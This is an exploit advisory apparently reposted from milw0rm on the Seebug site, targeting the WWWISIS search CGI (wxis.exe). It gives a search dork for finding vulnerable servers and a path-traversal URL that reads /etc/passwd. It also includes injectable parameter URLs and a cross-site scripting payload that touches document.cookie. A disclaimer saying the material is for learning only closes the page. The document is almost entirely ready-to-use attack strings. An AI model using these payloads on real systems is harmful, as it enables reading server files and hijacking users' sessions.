# WWWISIS (Search) Multiple Vulnerabilities # Download: # http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 # Bug found by JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # d0rk: powered by WWWISIS #Stop lammer # Local File Disclosure Vulnerability: http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd # Exploit In (XSS): http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e .... [ i,e ... ] it is the language of script # Cross Siting Scripting: <script>alert(document.cookie)</script> //---------------------------------------\\ Greetz To: All Hackers JosS! # milw0rm.com [2007-10-13]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论